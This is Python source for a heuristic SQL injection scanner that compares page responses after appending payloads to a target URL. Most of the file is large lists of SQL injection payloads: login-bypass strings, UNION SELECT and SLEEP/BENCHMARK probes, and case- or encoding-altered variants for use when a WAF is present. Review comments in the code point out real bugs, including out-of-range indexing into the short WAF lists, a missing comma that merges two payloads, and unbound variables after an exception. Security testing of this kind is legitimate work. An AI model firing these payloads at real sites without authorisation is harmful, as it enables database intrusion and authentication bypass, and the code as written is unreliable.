def Integer_sqlinj_scan(self):
    """Heuristic check of self.url for a numeric parameter that reaches SQL.

    Fetches three variants of the URL — unmodified, with "+1" appended and
    with "+1-1" appended — and compares them both by MD5 of the response
    body and by DOM.check().  A response that matches the "+1-1" variant but
    differs from the "+1" variant is treated as a finding.

    Assumes self.url ends in the numeric value the suffix should attach to;
    presumably the caller guarantees that — verify.

    Returns:
        self.url when the comparison trips, otherwise 0.
    """
    # NOTE(review): urlencode here is presumably a project helper that
    # percent-encodes a plain string; urllib.parse.urlencode takes a
    # mapping/sequence of pairs and would raise TypeError on '+1' — confirm.
    try:
        res_md5_1 = md5_encrypt(
            requests.get(url=self.url, headers=HEADER).text)
        res_md5_2 = md5_encrypt(
            requests.get(url=self.url + urlencode('+1'), headers=HEADER).text)
        res_md5_3 = md5_encrypt(
            requests.get(url=self.url + urlencode('+1-1'), headers=HEADER).text)
        res_DOM_1 = DOM.check(self.url)
        res_DOM_2 = DOM.check(self.url + urlencode('+1'))
        res_DOM_3 = DOM.check(self.url + urlencode('+1-1'))
    except Exception as e:
        # Best-effort: any request/DOM failure is printed and the md5
        # results are zeroed so the md5 branch below cannot match.
        # NOTE(review): res_DOM_1..3 get no fallback, so if the exception
        # fires before DOM.check runs, the comparison below raises NameError.
        print(e)
        res_md5_1 = res_md5_2 = res_md5_3 = 0
        pass
    # A finding needs the "+1-1" response to equal the baseline while the
    # "+1" response differs; either the DOM or the md5 comparison suffices.
    if (res_DOM_1 == res_DOM_3 and res_DOM_1 != res_DOM_2) or (
            (res_md5_1 == res_md5_3) and res_md5_1 != res_md5_2):
        return self.url
    return 0
def Str_sqlinj_scan(self, waf):
    """Heuristic check of self.url for a string parameter that reaches SQL.

    For each quote prefix and ten rounds, two suffixes p0 and p1 are built
    from a prefix plus a randomly chosen payload, then three responses are
    compared: the unmodified URL, URL + p0 and URL + p1 (by MD5 of the body
    and by DOM.check()).  The first round where the p1 response matches the
    baseline while the p0 response differs is reported.

    Args:
        waf: object exposing cget("text"); when that text is exactly
            'WAF:None' the payload_0/payload_1 lists are used, otherwise
            payload_3/payload_4.  Looks like a Tkinter widget — confirm.

    Returns:
        str "<p0>~<url>" for the first round that trips the comparison,
        otherwise 0.
    """
    # Prefix tried before each payload: single quote, double quote, none.
    quotes = ['\'', '"', '']
    # "false" variants (condition 0). 88 entries; indexed by
    # random.randint(0, 85) below, which stays in range.
    payload_0 = [
        " and 0;-- ", "/**/and/**/0;#", "\tand\t0;#", "\nand/**/0;#",
        "\'-\'", "\' \'", "\'&\'", "\'^\'", "\'*\'",
        "\' or \'\'-\'", "\' or \'\' \'", "\' or \'\'&\'", "\' or \'\'^\'", "\' or \'\'*\'",
        "\"-\"", "\" \"", "\"&\"", "\"^\"", "\"*\"",
        "\" or \"\"-\"", "\" or \"\" \"", "\" or \"\"&\"", "\" or \"\"^\"", "\" or \"\"*\"",
        "or true--", "\" or true--", "\' or true--", "\") or true--", "\') or true--",
        "\' or \'x\'=\'x", "\') or (\'x\')=(\'x", "\')) or ((\'x\'))=((\'x",
        "\" or \"x\"=\"x", "\") or (\"x\")=(\"x", "\")) or ((\"x\"))=((\"x",
        "or 1=1", "or 1=1--", "or 1=1#", "or 1=1/*",
        "admin\' --", "admin\' #", "admin\'/*",
        "admin\' or \'1\'=\'1", "admin\' or \'1\'=\'1\'--", "admin\' or \'1\'=\'1\'#", "admin\' or \'1\'=\'1\'/*",
        "admin\'or 1=1 or \'\'=\'",
        "admin\' or 1=1", "admin\' or 1=1--", "admin\' or 1=1#", "admin\' or 1=1/*",
        "admin\') or (\'1\'=\'1", "admin\') or (\'1\'=\'1\'--", "admin\') or (\'1\'=\'1\'#", "admin\') or (\'1\'=\'1\'/*",
        "admin\') or \'1\'=\'1", "admin\') or \'1\'=\'1\'--", "admin\') or \'1\'=\'1\'#", "admin\') or \'1\'=\'1\'/*",
        "1234 \' AND 1=0 UNION ALL SELECT \'admin\', \'81dc9bdb52d04dc20036dbd8313ed055",
        "admin\" --", "admin\" #", "admin\"/*",
        "admin\" or \"1\"=\"1", "admin\" or \"1\"=\"1\"--", "admin\" or \"1\"=\"1\"#", "admin\" or \"1\"=\"1\"/*",
        "admin\"or 1=1 or \"\"=\"",
        "admin\" or 1=1", "admin\" or 1=1--", "admin\" or 1=1#", "admin\" or 1=1/*",
        "admin\") or (\"1\"=\"1", "admin\") or (\"1\"=\"1\"--", "admin\") or (\"1\"=\"1\"#", "admin\") or (\"1\"=\"1\"/*",
        "admin\") or \"1\"=\"1", "admin\") or \"1\"=\"1\"--", "admin\") or \"1\"=\"1\"#", "admin\") or \"1\"=\"1\"/*",
        "1234 \" AND 1=0 UNION ALL SELECT \"admin\", \"81dc9bdb52d04dc20036dbd8313ed05\"",
        " UNION ALL SELECT 1,2,3,4",
        " UNION ALL SELECT 1,2,3,4,5-- ",
        " UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5",
        " UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL-- ",
        " AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))-- ",
        " UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5--",
        " RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='",
    ]
    # "true" counterparts (condition 1) of payload_0.
    # NOTE(review): the entry after `admin\") or \"1\"=\"1\"/*` is missing a
    # trailing comma, so the two adjacent literals are implicitly
    # concatenated into one element; the list is one entry shorter than
    # payload_0 (87, still within randint(0, 85)).  p0 and p1 are drawn with
    # independent random indexes below, so the lists are never used as
    # aligned pairs anyway — presumably unintended; confirm.
    payload_1 = [
        " and 1;-- ", "/**/and/**/1;#", "\tand\t1;#", "\nand/**/1;#",
        "\'-\'", "\' \'", "\'&\'", "\'^\'", "\'*\'",
        "\' or \'\'-\'", "\' or \'\' \'", "\' or \'\'&\'", "\' or \'\'^\'", "\' or \'\'*\'",
        "\"-\"", "\" \"", "\"&\"", "\"^\"", "\"*\"",
        "\" or \"\"-\"", "\" or \"\" \"", "\" or \"\"&\"", "\" or \"\"^\"", "\" or \"\"*\"",
        "or true--", "\" or true--", "\' or true--", "\") or true--", "\') or true--",
        "\' or \'x\'=\'x", "\') or (\'x\')=(\'x", "\')) or ((\'x\'))=((\'x",
        "\" or \"x\"=\"x", "\") or (\"x\")=(\"x", "\")) or ((\"x\"))=((\"x",
        "or 1=1", "or 1=1--", "or 1=1#", "or 1=1/*",
        "admin\' --", "admin\' #", "admin\'/*",
        "admin\' or \'1\'=\'1", "admin\' or \'1\'=\'1\'--", "admin\' or \'1\'=\'1\'#", "admin\' or \'1\'=\'1\'/*",
        "admin\'or 1=1 or \'\'=\'",
        "admin\' or 1=1", "admin\' or 1=1--", "admin\' or 1=1#", "admin\' or 1=1/*",
        "admin\') or (\'1\'=\'1", "admin\') or (\'1\'=\'1\'--", "admin\') or (\'1\'=\'1\'#", "admin\') or (\'1\'=\'1\'/*",
        "admin\') or \'1\'=\'1", "admin\') or \'1\'=\'1\'--", "admin\') or \'1\'=\'1\'#", "admin\') or \'1\'=\'1\'/*",
        "1234 \' AND 1=0 UNION ALL SELECT \'admin\', \'81dc9bdb52d04dc20036dbd8313ed055",
        "admin\" --", "admin\" #", "admin\"/*",
        "admin\" or \"1\"=\"1", "admin\" or \"1\"=\"1\"--", "admin\" or \"1\"=\"1\"#", "admin\" or \"1\"=\"1\"/*",
        "admin\"or 1=1 or \"\"=\"",
        "admin\" or 1=1", "admin\" or 1=1--", "admin\" or 1=1#", "admin\" or 1=1/*",
        "admin\") or (\"1\"=\"1", "admin\") or (\"1\"=\"1\"--", "admin\") or (\"1\"=\"1\"#", "admin\") or (\"1\"=\"1\"/*",
        "admin\") or \"1\"=\"1", "admin\") or \"1\"=\"1\"--", "admin\") or \"1\"=\"1\"#", "admin\") or \"1\"=\"1\"/*",
        # missing comma: these two literals become one element (see note above)
        "1234 \" AND 1=0 UNION ALL SELECT \"" " UNION ALL SELECT 1,2,3,4",
        " UNION ALL SELECT 1,2,3,4,5-- ",
        " UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5",
        " UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL-- ",
        " AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))-- ",
        " UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5--",
        " RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='",
    ]
    # Lists used when waf.cget("text") is not 'WAF:None'.
    # NOTE(review): payload_3 and payload_4 are identical and hold only 21
    # entries each, yet are indexed with random.randint(0, 85) below.  Most
    # draws therefore raise IndexError, and because the pick happens before
    # the try block, that exception propagates out of this method.
    payload_3 = [
        " And 0;-- ", "/**/And/**/0;#", "\tAnd\t0;#", "\nAnd/**/0;#",
        " Union All Select 1,2,3,4",
        " Union All Select 1,2,3,4,5-- ",
        " Union All Select @@version,sleep(5),user(),benchmark(1000000,md5('A')),5",
        " Union All Select @@version,user(),sleep(5),benchmark(1000000,md5('A')),null,null,null-- ",
        " And 5650=CONVERT(int,(Union all selectchar(88)+char(88)+char(88)))-- ",
        " Union All Select 'inj'||'ect'||'xxx',2,3,4,5--",
        " Rlike (Select (case when (4346=4346) then 0x61646d696e else 0x28 end)) and 'Txws'='",
        " And%200;--",
        " Union%20All%20Select%201,2,3,4",
        " Union%20All%20Select%201,2,3,4,5--",
        " Union%20All%20Select%20@@version,sleep(5),user(),benchmark(1000000,md5(%27A%27)),5",
        " Union%20All%20Select%20@@version,user(),sleep(5),benchmark(1000000,md5(%27A%27)),null,null,null--",
        " And%205650=CONVERT(int,(Union%20all%20selectchar(88)+char(88)+char(88)))--",
        " Union%20All%20Select%20%27inj%27||%27ect%27||%27xxx%27,2,3,4,5--",
        " Rlike%20(Select%20(case%20when%20(4346=4346)%20then%200x61646d696e%20else%200x28%20end))%20and%20%27Txws%27=%27",
        " chr(97)+chr(110)+chr(100) 0;-- ",
        " aandNandd 0;-- ",
    ]
    # Same content as payload_3 (see note above).
    payload_4 = [
        " And 0;-- ", "/**/And/**/0;#", "\tAnd\t0;#", "\nAnd/**/0;#",
        " Union All Select 1,2,3,4",
        " Union All Select 1,2,3,4,5-- ",
        " Union All Select @@version,sleep(5),user(),benchmark(1000000,md5('A')),5",
        " Union All Select @@version,user(),sleep(5),benchmark(1000000,md5('A')),null,null,null-- ",
        " And 5650=CONVERT(int,(Union all selectchar(88)+char(88)+char(88)))-- ",
        " Union All Select 'inj'||'ect'||'xxx',2,3,4,5--",
        " Rlike (Select (case when (4346=4346) then 0x61646d696e else 0x28 end)) and 'Txws'='",
        " And%200;--",
        " Union%20All%20Select%201,2,3,4",
        " Union%20All%20Select%201,2,3,4,5--",
        " Union%20All%20Select%20@@version,sleep(5),user(),benchmark(1000000,md5(%27A%27)),5",
        " Union%20All%20Select%20@@version,user(),sleep(5),benchmark(1000000,md5(%27A%27)),null,null,null--",
        " And%205650=CONVERT(int,(Union%20all%20selectchar(88)+char(88)+char(88)))--",
        " Union%20All%20Select%20%27inj%27||%27ect%27||%27xxx%27,2,3,4,5--",
        " Rlike%20(Select%20(case%20when%20(4346=4346)%20then%200x61646d696e%20else%200x28%20end))%20and%20%27Txws%27=%27",
        " chr(97)+chr(110)+chr(100) 0;-- ",
        " aandNandd 0;-- ",
    ]
    # Three quote prefixes x ten random rounds; j is only a counter.
    # Each round issues six requests, including a fresh baseline fetch.
    for i in quotes:
        for j in range(10):
            # Payload list selection depends on the WAF label text.
            if waf.cget("text") == 'WAF:None':
                p0 = i + payload_0[random.randint(0, 85)]
                p1 = i + payload_1[random.randint(0, 85)]
            else:
                p0 = i + payload_3[random.randint(0, 85)]
                p1 = i + payload_4[random.randint(0, 85)]
            # NOTE(review): urlencode here is presumably a project helper
            # that percent-encodes a plain string; urllib.parse.urlencode
            # takes a mapping/sequence of pairs — confirm.
            try:
                res_md5_1 = md5_encrypt(
                    requests.get(url=self.url, headers=HEADER).text)
                res_md5_2 = md5_encrypt(
                    requests.get(url=self.url + urlencode(p0), headers=HEADER).text)
                res_md5_3 = md5_encrypt(
                    requests.get(url=self.url + urlencode(p1), headers=HEADER).text)
                res_DOM_1 = DOM.check(self.url)
                res_DOM_2 = DOM.check(self.url + urlencode(p0))
                res_DOM_3 = DOM.check(self.url + urlencode(p1))
            except Exception as e:
                # Best-effort: print and zero the md5 results so the md5
                # branch below cannot match for this round.
                # NOTE(review): res_DOM_1..3 get no fallback, so a failure
                # before DOM.check runs leaves them unbound (or stale from a
                # previous round) when the comparison below executes.
                print(e)
                res_md5_1 = res_md5_2 = res_md5_3 = 0
                pass
            # A finding needs the p1 response to equal the baseline while
            # the p0 response differs; DOM or md5 comparison suffices.
            if (res_DOM_1 == res_DOM_3 and res_DOM_1 != res_DOM_2) or (
                    (res_md5_1 == res_md5_3) and res_md5_1 != res_md5_2):
                return p0 + "~" + self.url
    return 0